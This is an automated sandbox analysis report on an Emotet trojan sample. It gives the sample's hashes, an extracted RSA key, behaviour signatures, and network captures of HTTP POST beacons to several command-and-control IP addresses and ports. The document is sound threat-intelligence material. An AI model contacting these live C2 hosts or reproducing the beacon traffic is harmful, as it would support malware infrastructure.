Analysis

  • max time kernel
    109s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-07-2020 01:57

General

  • Target

    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe

  • Size

    100KB

  • MD5

    6ddb546eae9ff4664bc19c6af377353d

  • SHA1

    f255bdd6a038b7f9ae97747170dada6754e63da3

  • SHA256

    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89

  • SHA512

    fff63a2ff9aa4bfeeec35b350345bf7796db38310ca9b9336df4bd005b38b477d5f9e3d29d6a06aa9490541f215b84cf0c6597e76230cc924c65d44922079444

Score
10/10

Malware Config

Extracted

Family

emotet

C2

rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious use of SetWindowsHookEx 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    "C:\Users\Admin\AppData\Local\Temp\046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: EmotetMutantsSpam
    • Suspicious use of SetWindowsHookEx
    PID:672

Network

  • flag-unknown
    POST
    http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /PozeOi1T0cb/8ln6jjX6miWRur26H1P/ HTTP/1.1
    Referer: http://177.144.130.105/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    Content-Type: multipart/form-data; boundary=---------------------------756070110702999
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 177.144.130.105:443
    Content-Length: 4372
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-unknown
    POST
    http://77.74.78.80:443/dfkwbOy/GhbhZgL/
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    Remote address:
    77.74.78.80:443
    Request
    POST /dfkwbOy/GhbhZgL/ HTTP/1.1
    Referer: http://77.74.78.80/dfkwbOy/GhbhZgL/
    Content-Type: multipart/form-data; boundary=---------------------------135844738322007
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 77.74.78.80:443
    Content-Length: 4388
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 19 Jul 2020 01:56:54 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 177.144.130.105:443
    http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
    http
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    5.3kB
    252 B
    9
    6

    HTTP Request

    POST http://177.144.130.105:443/PozeOi1T0cb/8ln6jjX6miWRur26H1P/
  • 198.27.69.201:8080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 157.7.164.178:8081
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 78.188.170.128:80
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    3
  • 203.153.216.178:7080
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    152 B
    120 B
    3
    3
  • 77.74.78.80:443
    http://77.74.78.80:443/dfkwbOy/GhbhZgL/
    http
    046f4c2bc70de4777aa633c981698a61457d091bdd12b6417700394420c33d89.exe
    5.3kB
    988 B
    11
    10

    HTTP Request

    POST http://77.74.78.80:443/dfkwbOy/GhbhZgL/

    HTTP Response

    200
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 239.255.255.250:1900
    966 B
    6

MITRE ATT&CK Matrix

Downloads

  • memory/672-0-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/672-1-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB
